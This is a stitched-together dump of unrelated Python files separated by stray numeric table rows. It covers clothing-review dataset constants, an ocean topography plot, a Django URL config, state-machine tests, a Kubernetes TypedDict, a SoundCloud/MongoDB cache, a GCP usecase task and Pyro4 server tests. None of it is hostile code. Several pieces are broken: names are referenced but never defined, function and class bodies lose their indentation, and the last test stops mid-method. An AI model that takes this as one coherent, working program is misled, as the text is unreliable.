WECR_COLUMN_CLOTHING_ID = "Clothing ID"
WECR_COLUMN_AGE = "Age"
WECR_COLUMN_TITLE = "Title"
WECR_COLUMN_REVIEW_TEXT = "Review Text"
WECR_COLUMN_RATING = "Rating"
WECR_COLUMN_RECOMMENDED_IND = "Recommended IND"
WECR_COLUMN_POSITIVE_FEEDBACK_COUNT = "Positive Feedback Count"
WECR_COLUMN_DIVISION_NAME = "Division Name"
WECR_COLUMN_DEPARTMENT_NAME = "Department Name"
WECR_COLUMN_CLASS_NAME = "Class Name"


def _snake(header):
    """snake_case rendition of a human-readable column header."""
    return header.lower().replace(" ", "_")


# Raw header -> database column name.  The unnamed index column becomes "id";
# every other header is simply snake_cased.
WECR_COLUMN_NAME_MAP = {WECR_COLUMN_ID: "id"}
WECR_COLUMN_NAME_MAP.update(
    (header, _snake(header))
    for header in (
        WECR_COLUMN_CLOTHING_ID,
        WECR_COLUMN_AGE,
        WECR_COLUMN_TITLE,
        WECR_COLUMN_REVIEW_TEXT,
        WECR_COLUMN_RATING,
        WECR_COLUMN_RECOMMENDED_IND,
        WECR_COLUMN_POSITIVE_FEEDBACK_COUNT,
        WECR_COLUMN_DIVISION_NAME,
        WECR_COLUMN_DEPARTMENT_NAME,
        WECR_COLUMN_CLASS_NAME,
    )
)
# pandas dtype per raw column ("Int64" is the nullable integer dtype).
WECR_DATASET_COLUMNS_TYPE_MAP = {
    WECR_COLUMN_CLOTHING_ID: "Int64",
    WECR_COLUMN_AGE: "Int64",
    WECR_COLUMN_TITLE: str,
    WECR_COLUMN_REVIEW_TEXT: str,
    WECR_COLUMN_RATING: "Int64",
    WECR_COLUMN_RECOMMENDED_IND: "Int64",
    WECR_COLUMN_POSITIVE_FEEDBACK_COUNT: "Int64",
    WECR_COLUMN_DIVISION_NAME: str,
    WECR_COLUMN_DEPARTMENT_NAME: str,
    WECR_COLUMN_CLASS_NAME: str,
}
WECR_DATASET_COLUMNS = WECR_DATASET_COLUMNS_TYPE_MAP.keys()
# Every column except the clothing id may legitimately be missing.
WECR_DATASET_NULLABLE_COLUMNS = [
    column for column in WECR_DATASET_COLUMNS if column != WECR_COLUMN_CLOTHING_ID
]
def MACRO_GET_DATASET_DIR(table):
    """Build the path of *table*'s CSV file inside the docker data directory."""
    return "{}/{}{}".format(DATA_DIR, table, DATA_FILE_EXTENSION)
def MACRO_GET_REQUIRED_COLUMNS(dataframe, nullable_columns):
    """Return the columns of *dataframe* that must be non-null, or ``None``.

    Args:
        dataframe: any object with an iterable ``columns`` attribute
            (e.g. a pandas DataFrame).
        nullable_columns: column names that are allowed to contain nulls.

    Returns:
        List of required (non-nullable) column names, or ``None`` when every
        column is nullable -- the sentinel callers expect.
    """
    # Renamed the local: the original called this ``nullable_cols`` although
    # it holds the NON-nullable (required) columns.
    required_cols = [col for col in dataframe.columns if col not in nullable_columns]
    return required_cols if required_cols else None
| 7,297 | 3,152 |
# coding: utf-8
# This script makes a 3D plot of the Southern Ocean topography.
#
# The data comes from some geophysiscists at Columbia. The product is "MGDS: Global Multi-Resolution Topography". These folks took all multibeam swath data that they can get their hands on and filled gaps with Smith and Sandwell. See http://www.marine-geo.org/portals/gmrt/ for data covarage.
import numpy as np
import matplotlib.pyplot as plt
# get_ipython().magic('matplotlib inline')
from netCDF4 import Dataset
from mpl_toolkits.basemap import Basemap
import scipy as sp
import scipy.interpolate
import scipy.io as io
import seawater as sw
from pyspec import spectrum as spec
import cmocean
from mpl_toolkits.mplot3d import Axes3D
plt.close("all")
## select different regions
def subregion_plot(latmin=-64,lonmin=-100,dlat=8,dlon=15):
latmax = latmin+dlat
lonmax = lonmin+dlon
lon = np.array([lonmin,lonmax,lonmax,lonmin,lonmin])
lat = np.array([latmin,latmin,latmax,latmax,latmin])
x,y = m(lon,lat)
return x,y
def extract_topo(lon,lat,latmin=-64,lonmin=-100,dlat=8,dlon=15):
    """Slice the global topography down to a lat/lon box.

    Uses the module-level topography array ``z`` (assigned further down the
    script), so this must only be called after ``z`` is loaded.
    Returns (lon_subset, lat_subset, topo_subset).
    """
    latmax = latmin+dlat
    lonmax = lonmin+dlon
    flat = (lat>=latmin)&(lat<=latmax)
    flon = (lon>=lonmin)&(lon<=lonmax)
    lont = lon[flon]
    latt = lat[flat]
    topo = z[flat,:]  # rows = latitude first, then columns = longitude
    topo = topo[:,flon]
    return lont,latt,topo
# --- Load input data -------------------------------------------------------
topo = Dataset('GMRTv3_1_20160124topo.grd')  # GMRT topography grid
pf = Dataset('SO_polar_fronts.v3.nc')  # Southern Ocean front positions
lonpf, latpf,latsaf,latsafn = pf['lon'][:], pf['latPF'][:],pf['latSAF'][:], pf['latSAFN'][:]
time = pf['is_aviso_nrt'][:]
# Time-average each front's latitude (PF, SAF, SAF-N) onto the front lon grid.
latpf = latpf.reshape(time.size,lonpf.size)
latpf = np.nanmean(latpf,axis=0).squeeze()
latsaf = latsaf.reshape(time.size,lonpf.size)
latsaf = np.nanmean(latsaf,axis=0).squeeze()
latsafn = latsafn.reshape(time.size,lonpf.size)
latsafn = np.nanmean(latsafn,axis=0).squeeze()
x = topo['lon'][:]
y = topo['lat'][:]
#z = (topo['z'][:]).reshape(y.size,x.size)
z = topo['altitude'][:]
# get a subset
latmin, latmax = -80., -20
lonmin, lonmax = -180., 180.
flat = (y>=latmin)&(y<=latmax)
flon = (x>=lonmin)&(x<=lonmax)
lat = y[flat]
lon = x[flon]
z = z[flat,:]
z = z[:,flon]
z = np.ma.masked_array(z,z>=0)  # mask land (elevation >= 0 m)
# NOTE(review): x,y are overwritten by the next line and never used afterwards.
x,y = np.meshgrid(lon,lat)
lon,lat = np.meshgrid(lon,lat)
z[z>=0]=0.  # clamp any unmasked land points to sea level for plotting
# --- 3D surface plot -------------------------------------------------------
fig = plt.figure(figsize=(22,8))
ax = fig.add_subplot(111, projection='3d')
# this controls the quality of the plot
# set to =1 for maximum quality
dec = 10
#ax.contourf(lon[::dec,::dec],lat[::dec,::dec],z[::dec,::dec], [-2000, -1000], cmap=cmocean.cm.bathy_r)
surf = ax.plot_surface(lon[::dec,::dec],lat[::dec,::dec],z[::dec,::dec],
linewidth=0, rstride=1, cstride=1, alpha=1, cmap='YlGnBu',
vmin=-5500,vmax=-500)
# fill the coastline (z in [-1, 0]) with a solid land colour
ax.contourf(lon[::dec,::dec],lat[::dec,::dec],z[::dec,::dec],[-1.,0],colors='peru')
ax.set_zticks([])
ax.view_init(75, 290)  # elevation/azimuth of the camera
#ax.plot(xpf,ypf,'w.')
#ax.plot(xsaf,ysaf,'w.')
lonpf[lonpf>180] = lonpf[lonpf>180]-360  # wrap 0..360 longitudes to -180..180
# draw the three averaged fronts at a constant depth of -2000 m
ax.plot(lonpf,latpf,-2000,'w.')
ax.plot(lonpf,latsaf,-2000,'w.')
ax.plot(lonpf,latsafn,-2000,'w.')
fig.subplots_adjust(right=0.8)
cbar_ax = fig.add_axes([0.745, 0.2, 0.02, 0.4])
fig.colorbar(surf, cax=cbar_ax,label=r'',extend='both')
#plt.savefig('SO3DTopo.pdf',bbox_inches='tight')
plt.savefig('SO3DTopo.png',bbox_inches='tight',dpi=300)
#plt.show()
| 3,262 | 1,521 |
from django.conf.urls import url
from login.views import login
app_name = 'logins'  # URL namespace used when reversing, e.g. 'logins:login'
urlpatterns = [
    # NOTE(review): django.conf.urls.url() is deprecated and removed in
    # Django 4.0 -- migrate to django.urls.re_path/path when upgrading.
    url(r'^$', login, name='login')
]
from behavior_machine.library.parallel_state import ParallelState
import time
from behavior_machine.core import Board, StateStatus, State, Machine, machine
from behavior_machine.library import IdleState
def test_repeat_node_in_machine_fast():
    """Three counting states cycle via on-success transitions at 60 Hz for
    two seconds; the total tick count should be close to 120."""
    ticks = 0

    class CounterState(State):
        def execute(self, board: Board) -> StateStatus:
            nonlocal ticks
            ticks += 1
            return StateStatus.SUCCESS

    states = [CounterState(name) for name in ("ds1", "ds2", "ds3")]
    # Wire the states into a ring: ds1 -> ds2 -> ds3 -> ds1.
    for current, following in zip(states, states[1:] + states[:1]):
        current.add_transition_on_success(following)
    exe = Machine('exe', states[0], rate=60)
    exe.start(None)
    time.sleep(2)
    exe.interrupt()
    # the performance of the computer might change this.
    assert ticks >= (60 * 2) - 2
    assert ticks <= (60 * 2) + 1
def test_validate_transition_immediate():
    """Same ring of counting states as above, but wired with always-true
    predicate transitions; the tick rate must match the machine rate."""
    ticks = 0

    class CounterState(State):
        def execute(self, board: Board) -> StateStatus:
            nonlocal ticks
            ticks += 1
            return StateStatus.SUCCESS

    states = [CounterState(name) for name in ("ds1", "ds2", "ds3")]
    # Ring topology via unconditional predicate transitions.
    for current, following in zip(states, states[1:] + states[:1]):
        current.add_transition(lambda s, b: True, following)
    exe = Machine('exe', states[0], rate=60)
    exe.start(None)
    time.sleep(2)
    exe.interrupt()
    # the performance of the computer might change this.
    assert ticks >= (60 * 2) - 2
    assert ticks <= (60 * 2) + 1
def test_multiple_parallel_states():
    """500 trivially-succeeding states under one ParallelState: the machine
    should start, run them all, and finish in well under 100 ms."""
    class CompleteState(State):
        def execute(self, board: Board) -> StateStatus:
            return StateStatus.SUCCESS

    num_parallel = 500
    # Idiomatic comprehension instead of the original append loop.
    child_states = [CompleteState(f"I{i}") for i in range(num_parallel)]
    pp = ParallelState("parallel", child_states)
    exe = Machine('exe', pp, end_state_ids=['parallel'], rate=100)
    start_time = time.time()
    exe.start(None)
    exe.wait()
    elapsed_time = time.time() - start_time
    assert elapsed_time < (1/10)
| 2,136 | 718 |
# Code generated by `typeddictgen`. DO NOT EDIT.
"""V1NFSVolumeSourceDict generated type."""
from typing import TypedDict

# Typed dict mirror of the Kubernetes V1NFSVolumeSource object.
# total=False: every key is optional.
V1NFSVolumeSourceDict = TypedDict(
    "V1NFSVolumeSourceDict",
    {
        "path": str,
        "readOnly": bool,
        "server": str,
    },
    total=False,
)
| 289 | 101 |
import soundcloud
import os
import logging
from datetime import datetime
import requests
import sys
from celeryconfig import mongolab
import pymongo
from pymongo import MongoClient
from pymongo.errors import OperationFailure
# SoundCloud REST endpoint templates; fill in with .format(_id=...).
USER = '/users/{_id}'
USER_TRACKS = '/users/{_id}/tracks'
USER_FOLLOWINGS = '/users/{_id}/followings'
USER_FOLLOWERS = '/users/{_id}/followers'
USER_WEB_PROFILES = '/users/{_id}/web-profiles'
TRACK = '/tracks/{_id}'
TRACK_COMMENTS = '/tracks/{_id}/comments'
TRACK_FAVORITERS = '/tracks/{_id}/favoriters'
# Media endpoints (redirecting; streamed rather than cached -- see Sc.get_sc).
TRACK_DOWNLOAD = '/tracks/{_id}/download'
TRACK_STREAM = '/tracks/{_id}/stream'
class RequestDB(object):
    """MongoDB-backed key/value cache for API responses.

    Documents in the ``requests`` collection look like
    ``{"key": ..., "value": ..., "retrieved": <utc datetime>}``.
    """

    client = None
    db = None
    coll = None
    logger = None

    def __init__(self, db_name="soundcloud", logger=logging.getLogger("")):
        """Connect to the configured MongoDB and ensure a unique index on key."""
        self.logger = logger
        self.client = MongoClient(mongolab)
        self.db = self.client[db_name]
        self.coll = self.db.requests
        try:
            # BUG FIX: the original passed ("unique", True) inside the key
            # specification list, which created a compound index on a bogus
            # "unique" field instead of a unique index on "key".  The unique
            # constraint belongs in a keyword argument.  create_index also
            # replaces the long-deprecated ensure_index.
            self.coll.create_index([("key", pymongo.ASCENDING)], unique=True)
        except OperationFailure as e:
            logger.error("Could not create index.")
            logger.error(e)

    def get(self, key):
        """Return the cached value for *key*, or None when absent."""
        v = self.coll.find_one({"key": key})
        if v is not None:
            return v["value"]
        else:
            return None

    def set(self, key, value):
        """Upsert *value* under *key*, stamping the retrieval time."""
        now = datetime.utcnow()
        doc = {"key": key, "value": value, "retrieved": now}
        self.coll.update({"key": key}, doc, upsert=True)
        self.logger.info("Stored {} in db".format(key))

    def close(self):
        # BUG FIX: pymongo Database objects have no close(); the connection
        # is owned by the MongoClient, so close that instead.
        if self.client is not None:
            self.client.close()
class Sc(object):
    """Thin SoundCloud API wrapper that caches JSON responses in RequestDB."""

    _sc_client = None
    _db = None
    _logger = None

    def __init__(self, sc_client=None, db_name="soundcloud",
    logger=logging.getLogger("")):
        """Build a soundcloud.Client from $SOUNDCLOUD_CLIENT_ID unless one is given.

        Exits the process when no client id is configured.
        """
        self._logger = logger
        if sc_client is None:
            sc_client_id = os.getenv('SOUNDCLOUD_CLIENT_ID')
            if sc_client_id is None:
                err = "SOUNDCLOUD_CLIENT_ID was not set!"
                self._logger.error(err)
                sys.exit(err)
            sc_client = soundcloud.Client(client_id=sc_client_id)
        self._sc_client = sc_client
        self._db = RequestDB(db_name, logger)

    def get_sc(self, template, _id=None):
        """GET an API resource, serving from / populating the Mongo cache.

        When _id is None the template is used verbatim and treated as a
        redirecting media endpoint: the redirect target is fetched with
        ``requests`` as a stream and is NOT written to the cache.
        """
        key = template.format(_id=_id) if _id is not None else template
        self._logger.info("GET {}".format(key))
        value = self._db.get(key)
        if value is not None:
            return value
        else:
            if _id is None:
                # Media endpoint: resolve the redirect manually, then stream it.
                res = self._sc_client.get(key, allow_redirects=False)
                track_url = res.location
                return requests.get(track_url, stream=True)
            else:
                res = self._sc_client.get(key)
                if hasattr(res, "data"):
                    # Paged list of resources -> plain list of dicts.
                    res1 = [dict(o.fields()) for o in res]
                    self._db.set(key, res1)
                    return res1
                elif hasattr(res, "fields"):
                    # Single resource -> plain dict.
                    res1 = dict(res.fields())
                    self._logger.info(repr(res1))
                    self._db.set(key, res1)
                    return res1
                else:
                    # Unknown response shape; returned as-is and not cached.
                    return res

    def __del__(self):
        # Best-effort cleanup; __del__ may run during interpreter shutdown.
        if self._db is not None:
            self._db.close()
def prefill_user(user_id):
    """Warm the request cache with a user's core resources."""
    sc = Sc(db_name="soundcloud")
    templates = (USER, USER_WEB_PROFILES,
                 USER_FOLLOWINGS, USER_TRACKS, USER_FOLLOWERS)
    for template in templates:
        sc.get_sc(template, user_id)
| 3,580 | 1,130 |
from api.gcp.tasks.baseTask import baseTask
from db.usecase.db_usecase_mgr import usecase_mgr
from googleapiclient.errors import HttpError
from utils.status_code import response_code
import traceback
import json
import logging
logger = logging.getLogger("main.api.gcp.tasks" + __name__)
class system_add_new_usecase(baseTask):
    """System task that creates a new usecase record and grants the owner
    group access to its resources.

    Required ``stage_dict`` keys are listed in ``arguments``.  ``execute``
    returns a response dict containing at least ``code`` plus ``msg``/``data``.
    """
    api_type = 'system'
    api_name = 'system_add_new_usecase'
    # Required input fields with their expected types and defaults.
    arguments = {
        'usecase_name': {"type": str, "default": ''},
        "region_country": {"type": str, "default": ''},
        'validity_date': {"type": str, "default": ''},
        "uc_des": {"type": str, "default": ''},
        'admin_sa': {"type": str, "default": ''},
        "budget": {"type": int, "default": 0},
        'allow_cross_region': {"type": str, "default": ''},
        "resources_access": {"type": str, "default": ''},
        "uc_team_group": {"type": str, "default": ''},
        "uc_owner_group": {"type": str, "default": ''},
        "uc_label": {"type": str, "default": ''},
    }

    def __init__(self, stage_dict):
        super(system_add_new_usecase, self).__init__(stage_dict)

    def execute(self, workspace_id=None, form_id=None, input_form_id=None, user_id=None):
        """Validate inputs, create the usecase, then attach owner-group access.

        Returns the manager's response dict, or a BAD_REQUEST-style dict with
        a 'msg' describing the error.
        """
        try:
            # BUG FIX: test key presence directly instead of comparing the
            # value against the sentinel string 'NotFound', which wrongly
            # classified a legitimate value of 'NotFound' as missing.
            missing_set = {key for key in self.arguments if key not in self.stage_dict}
            if missing_set:
                # Copy the shared response template before mutating it so the
                # module-level constant is not polluted with this request's msg.
                data = dict(response_code.BAD_REQUEST)
                data['msg'] = 'Missing parameters: {}'.format(', '.join(missing_set))
                return data
            usecase_info = self.stage_dict
            usecase_info['workspace_id'] = workspace_id
            usecase_info['uc_input_form'] = input_form_id
            usecase_info['user_id'] = user_id
            data = usecase_mgr.add_new_usecase_setting(usecase_info)
            if data['code'] == 200:
                usecase_id = data['data']['usecase_id']
                # Side-effect call; its return value was never used.
                usecase_mgr.update_usecase_resource(workspace_id, usecase_id, usecase_info['uc_owner_group'])
            return data
        except HttpError as e:
            error_json = json.loads(e.content, strict=False)
            data = error_json['error']
            data["msg"] = data.pop("message")
            logger.error("FN:system_add_new_usecase_execute error:{}".format(traceback.format_exc()))
            return data
        except Exception as e:
            logger.error("FN:system_add_new_usecase_execute error:{}".format(traceback.format_exc()))
            data = dict(response_code.BAD_REQUEST)
            data['msg'] = str(e)
            return data
"""
Tests for a running Pyro server, without timeouts.
Pyro - Python Remote Objects. Copyright by Irmen de Jong (irmen@razorvine.net).
"""
import time
import sys
import uuid
import unittest
import Pyro4.core
import Pyro4.errors
import Pyro4.util
import Pyro4.message
from Pyro4 import threadutil, current_context
from testsupport import *
@Pyro4.expose
class ServerTestObject(object):
    """Remote test fixture: plain methods, properties, oneway calls, and a
    deliberately unserializable exception."""
    something = 99  # plain class attribute (not a property)
    dict_attr = {}  # shadowed by a per-instance dict in __init__

    def __init__(self):
        self._dictionary = {"number": 42}
        self.dict_attr = {"number2": 43}
        self._value = 12345

    def getDict(self):
        return self._dictionary

    def getDictAttr(self):
        return self.dict_attr

    def multiply(self, x, y):
        return x * y

    def divide(self, x, y):
        # floor division: divide(999, 3) == 333; y == 0 raises ZeroDivisionError
        return x // y

    def ping(self):
        pass

    def echo(self, obj):
        return obj

    @Pyro4.oneway
    def oneway_delay(self, delay):
        time.sleep(delay)

    def delay(self, delay):
        time.sleep(delay)
        return "slept %d seconds" % delay

    def delayAndId(self, delay, id):
        time.sleep(delay)
        return "slept for " + str(id)

    def testargs(self, x, *args, **kwargs):
        return [x, list(args), kwargs]  # don't return tuples, this enables us to test json serialization as well.

    def nonserializableException(self):
        # the lambda makes this exception impossible to serialize on purpose
        raise NonserializableError(("xantippe", lambda x: 0))

    @Pyro4.oneway
    def oneway_multiply(self, x, y):
        return x * y

    @property
    def value(self):
        return self._value

    @value.setter
    def value(self, newvalue):
        self._value = newvalue

    @property
    def dictionary(self):
        return self._dictionary
class NotEverythingExposedClass(object):
    """Fixture with one exposed and one unexposed method, for REQUIRE_EXPOSE tests."""

    def __init__(self, name):
        self.name = name

    @Pyro4.expose
    def getName(self):
        return self.name

    def unexposed(self):
        return "you should not see this"  # .... only when REQUIRE_EXPOSE is set to True is this valid
class DaemonLoopThread(threadutil.Thread):
    """Runs a Pyro daemon's requestLoop in a background daemon thread."""

    def __init__(self, pyrodaemon):
        super(DaemonLoopThread, self).__init__()
        self.setDaemon(True)  # don't keep the process alive for this loop
        self.pyrodaemon = pyrodaemon
        self.running = threadutil.Event()  # set as soon as the thread starts
        self.running.clear()

    def run(self):
        self.running.set()
        try:
            self.pyrodaemon.requestLoop()
        except Pyro4.errors.CommunicationError:
            pass  # ignore pyro communication errors
class DaemonWithSabotagedHandshake(Pyro4.core.Daemon):
    """Daemon that deliberately rejects every connection with a CONNECTFAIL."""

    def _handshake(self, conn):
        # receive the client's handshake data
        msg = Pyro4.message.Message.recv(conn, [Pyro4.message.MSG_CONNECT], self._pyroHmacKey)
        # return a CONNECTFAIL
        serializer = Pyro4.util.get_serializer_by_id(msg.serializer_id)
        data, _ = serializer.serializeData("rigged connection failure", compress=False)
        msg = Pyro4.message.Message(Pyro4.message.MSG_CONNECTFAIL, data, serializer.serializer_id, 0, 1, hmac_key=self._pyroHmacKey)
        conn.send(msg.to_bytes())
        return False  # reject the connection
class ServerTestsBrokenHandshake(unittest.TestCase):
    """Client behaviour against a daemon whose handshake always fails."""

    def setUp(self):
        Pyro4.config.LOGWIRE = True
        Pyro4.config.SERIALIZERS_ACCEPTED.add("pickle")
        self.daemon = DaemonWithSabotagedHandshake(port=0)  # port=0: pick a free port
        obj = ServerTestObject()
        uri = self.daemon.register(obj, "something")
        self.objectUri = uri
        self.daemonthread = DaemonLoopThread(self.daemon)
        self.daemonthread.start()
        self.daemonthread.running.wait()
        time.sleep(0.05)  # give the request loop a moment to settle

    def tearDown(self):
        time.sleep(0.05)
        self.daemon.shutdown()
        self.daemonthread.join()
        Pyro4.config.SERIALIZERS_ACCEPTED.discard("pickle")

    def testDaemonConnectFail(self):
        # check what happens when the daemon responds with a failed connection msg
        with Pyro4.Proxy(self.objectUri) as p:
            try:
                p.ping()
                self.fail("expected CommunicationError")
            except Pyro4.errors.CommunicationError:
                # sys.exc_info kept for py2 compatibility in this code base
                xv = sys.exc_info()[1]
                message = str(xv)
                self.assertIn("reason:", message)
                self.assertIn("rigged connection failure", message)
class ServerTestsOnce(unittest.TestCase):
"""tests that are fine to run with just a single server type"""
def setUp(self):
    """Start a real daemon serving one fully-exposed and one partially-exposed object."""
    Pyro4.config.LOGWIRE = True
    Pyro4.config.SERIALIZERS_ACCEPTED.add("pickle")
    self.daemon = Pyro4.core.Daemon(port=0)  # port=0: pick a free port
    obj = ServerTestObject()
    uri = self.daemon.register(obj, "something")
    self.objectUri = uri
    obj2 = NotEverythingExposedClass("hello")
    self.daemon.register(obj2, "unexposed")
    self.daemonthread = DaemonLoopThread(self.daemon)
    self.daemonthread.start()
    self.daemonthread.running.wait()
    time.sleep(0.05)  # give the request loop a moment to settle

def tearDown(self):
    time.sleep(0.05)
    if self.daemon is not None:
        self.daemon.shutdown()
        self.daemonthread.join()
    Pyro4.config.SERIALIZERS_ACCEPTED.discard("pickle")

def testPingMessage(self):
    """Hand-craft a PING message on the raw connection and expect a pong back."""
    with Pyro4.core.Proxy(self.objectUri) as p:
        p._pyroBind()
        conn = p._pyroConnection
        msg = Pyro4.message.Message(Pyro4.message.MSG_PING, b"something", 42, 0, 999, hmac_key=p._pyroHmacKey)
        conn.send(msg.to_bytes())
        msg = Pyro4.message.Message.recv(conn, [Pyro4.message.MSG_PING], hmac_key=p._pyroHmacKey)
        self.assertEqual(Pyro4.message.MSG_PING, msg.type)
        self.assertEqual(999, msg.seq)  # the reply must echo our sequence number
        self.assertEqual(b"pong", msg.data)
        Pyro4.message.Message.ping(p._pyroConnection)  # the convenience method that does the above

def testSequence(self):
    """The proxy's sequence counter tracks calls; replies are matched server-side."""
    with Pyro4.core.Proxy(self.objectUri) as p:
        p.echo(1)
        p.echo(2)
        p.echo(3)
        self.assertEqual(3, p._pyroSeq, "should have 3 method calls")
        p._pyroSeq = 999  # hacking the seq nr won't have any effect because it is the reply from the server that is checked
        self.assertEqual(42, p.echo(42))
def testMetaOffAttrs(self):
    """With METADATA off, remote property/attribute access must fail."""
    try:
        old_meta = Pyro4.config.METADATA
        Pyro4.config.METADATA = False
        # should fail here, because there is no meta info about attributes
        with Pyro4.core.Proxy(self.objectUri) as p:
            self.assertEqual(55, p.multiply(5, 11))
            x = p.getDict()
            self.assertEqual({"number": 42}, x)
            # property
            with self.assertRaises(AttributeError):
                p.dictionary.update({"more": 666})
            # attribute
            with self.assertRaises(AttributeError):
                p.dict_attr.update({"more": 666})
            x = p.getDict()
            self.assertEqual({"number": 42}, x)
    finally:
        Pyro4.config.METADATA = old_meta

def testMetaOnAttrs(self):
    """With METADATA on, exposed properties work (as local copies); plain attributes don't."""
    try:
        old_meta = Pyro4.config.METADATA
        Pyro4.config.METADATA = True
        with Pyro4.core.Proxy(self.objectUri) as p:
            self.assertEqual(55, p.multiply(5, 11))
            # property
            x = p.getDict()
            self.assertEqual({"number": 42}, x)
            p.dictionary.update({"more": 666})  # should not fail because metadata is enabled and the dictionary property is retrieved as local copy
            x = p.getDict()
            self.assertEqual({"number": 42}, x)  # not updated remotely because we had a local copy
        with Pyro4.core.Proxy(self.objectUri) as p:
            with self.assertRaises(AttributeError):
                # attribute should fail (meta only works for exposed properties)
                p.dict_attr.update({"more": 666})
    finally:
        Pyro4.config.METADATA = old_meta

def testSomeArgumentTypes(self):
    """Positional, star-args and kwargs all survive the round trip."""
    with Pyro4.core.Proxy(self.objectUri) as p:
        self.assertEqual([1, [], {}], p.testargs(1))
        self.assertEqual([1, [2, 3], {'a': 4}], p.testargs(1, 2, 3, a=4))
        self.assertEqual([1, [], {'a': 2}], p.testargs(1, **{'a': 2}))

def testUnicodeKwargs(self):
    """Non-ASCII kwarg names and values keep their type and value."""
    with Pyro4.core.Proxy(self.objectUri) as p:
        self.assertEqual([1, [], {unichr(65): 2}], p.testargs(1, **{unichr(65): 2}))
        result = p.testargs(unichr(0x20ac), **{unichr(0x20ac): 2})  # 0x20ac = euro sign
        self.assertEqual(result[0], unichr(0x20ac))
        key = list(result[2].keys())[0]
        self.assertTrue(type(key) is unicode)
        self.assertEqual(key, unichr(0x20ac))
def testNormalProxy(self):
    """Plain remote method call works."""
    with Pyro4.core.Proxy(self.objectUri) as p:
        self.assertEqual(42, p.multiply(7, 6))

def testExceptions(self):
    """Server-side exceptions are re-raised with their original type on the client."""
    with Pyro4.core.Proxy(self.objectUri) as p:
        try:
            p.divide(1, 0)
            self.fail("should crash")
        except ZeroDivisionError:
            pass
        try:
            p.multiply("a", "b")
            self.fail("should crash")
        except TypeError:
            pass

def testProxyMetadata(self):
    """Binding a proxy populates _pyroAttrs/_pyroMethods/_pyroOneway from the daemon."""
    with Pyro4.core.Proxy(self.objectUri) as p:
        # unconnected proxies have empty metadata
        self.assertEqual(set(), p._pyroAttrs)
        self.assertEqual(set(), p._pyroMethods)
        self.assertEqual(set(), p._pyroOneway)
        # connecting it should obtain metadata (as long as METADATA is true)
        p._pyroBind()
        self.assertEqual({'value', 'dictionary'}, p._pyroAttrs)
        self.assertEqual({'echo', 'getDict', 'divide', 'nonserializableException', 'ping', 'oneway_delay', 'delayAndId', 'delay', 'testargs',
        'multiply', 'oneway_multiply', 'getDictAttr'}, p._pyroMethods)
        self.assertEqual({'oneway_multiply', 'oneway_delay'}, p._pyroOneway)
        # metadata can be re-fetched explicitly after being cleared
        p._pyroAttrs = None
        p._pyroGetMetadata()
        self.assertEqual({'value', 'dictionary'}, p._pyroAttrs)
        p._pyroAttrs = None
        p._pyroGetMetadata(self.objectUri.object)
        self.assertEqual({'value', 'dictionary'}, p._pyroAttrs)
        # supplying known metadata skips the remote round trip
        p._pyroAttrs = None
        p._pyroGetMetadata(known_metadata={"attrs": set(), "oneway": set(), "methods": {"ping"}})
        self.assertEqual(set(), p._pyroAttrs)
def testProxyAttrsMetadataOff(self):
    """Without metadata every attribute access yields a _RemoteMethod and sets succeed locally."""
    try:
        Pyro4.config.METADATA = False
        # read attributes
        with Pyro4.core.Proxy(self.objectUri) as p:
            a = p.multiply
            self.assertIsInstance(a, Pyro4.core._RemoteMethod)
            a = p.value
            self.assertIsInstance(a, Pyro4.core._RemoteMethod)
            a = p.non_existing_attribute
            self.assertIsInstance(a, Pyro4.core._RemoteMethod)
        # set attributes
        with Pyro4.core.Proxy(self.objectUri) as p:
            p.some_weird_attribute = 42  # stored on the proxy object itself
            self.assertEqual(42, p.some_weird_attribute)
    finally:
        Pyro4.config.METADATA = True

def testProxyAttrsMetadataOn(self):
    """With metadata, attribute access resolves real remote attrs and rejects unknown ones."""
    try:
        Pyro4.config.METADATA = True
        # read attributes
        with Pyro4.core.Proxy(self.objectUri) as p:
            # unconnected proxy still has empty metadata.
            # but, as soon as an attribute is used, the metadata is obtained (as long as METADATA is true)
            a = p.value
            self.assertEqual(12345, a)
            a = p.multiply
            self.assertIsInstance(a, Pyro4.core._RemoteMethod)  # multiply is still a regular method
            with self.assertRaises(AttributeError):
                _ = p.non_existing_attribute
        # set attributes, should also trigger getting metadata
        with Pyro4.core.Proxy(self.objectUri) as p:
            p.value = 42
            self.assertEqual(42, p.value)
            self.assertTrue("value" in p._pyroAttrs)
    finally:
        Pyro4.config.METADATA = True

def testProxyAnnotations(self):
    """Custom annotations travel with the request and the response carries CORR back."""
    class CustomAnnotationsProxy(Pyro4.core.Proxy):
        def __init__(self, uri, response):
            self.__dict__["response"] = response
            super(CustomAnnotationsProxy, self).__init__(uri)

        def _pyroAnnotations(self):
            # add a custom annotation and record what was sent
            ann = super(CustomAnnotationsProxy, self)._pyroAnnotations()
            ann["XYZZ"] = b"some data"
            self.__dict__["response"]["annotations_sent"] = ann
            return ann

        def _pyroResponseAnnotations(self, annotations, msgtype):
            self.__dict__["response"]["annotations"] = annotations
            self.__dict__["response"]["msgtype"] = msgtype

    response = {}
    corr_id = current_context.correlation_id = uuid.uuid4()
    with CustomAnnotationsProxy(self.objectUri, response) as p:
        p.ping()
    self.assertDictEqual({"CORR": corr_id.bytes, "XYZZ": b"some data"}, p.__dict__["response"]["annotations_sent"])
    self.assertEqual(Pyro4.message.MSG_RESULT, p.__dict__["response"]["msgtype"])
    self.assertDictEqual({"CORR": corr_id.bytes}, p.__dict__["response"]["annotations"])
def testExposedNotRequired(self):
    """With REQUIRE_EXPOSE off, even unexposed methods are callable."""
    try:
        old_require = Pyro4.config.REQUIRE_EXPOSE
        Pyro4.config.REQUIRE_EXPOSE = False
        with self.daemon.proxyFor("unexposed") as p:
            self.assertEqual({"unexposed", "getName"}, p._pyroMethods)
            self.assertEqual("hello", p.getName())
            self.assertEqual("you should not see this", p.unexposed())  # you *should* see it when REQUIRE_EXPOSE is False :)
    finally:
        Pyro4.config.REQUIRE_EXPOSE = old_require

def testExposedRequired(self):
    """With REQUIRE_EXPOSE on, unexposed methods/attributes raise AttributeError."""
    try:
        old_require = Pyro4.config.REQUIRE_EXPOSE
        Pyro4.config.REQUIRE_EXPOSE = True
        with self.daemon.proxyFor("unexposed") as p:
            self.assertEqual({"getName"}, p._pyroMethods)
            self.assertEqual("hello", p.getName())
            with self.assertRaises(AttributeError) as e:
                p.unexposed()
            expected_msg = "remote object '%s' has no exposed attribute or method 'unexposed'" % p._pyroUri
            self.assertEqual(expected_msg, str(e.exception))
            with self.assertRaises(AttributeError) as e:
                p.unexposed_set = 999
            expected_msg = "remote object '%s' has no exposed attribute 'unexposed_set'" % p._pyroUri
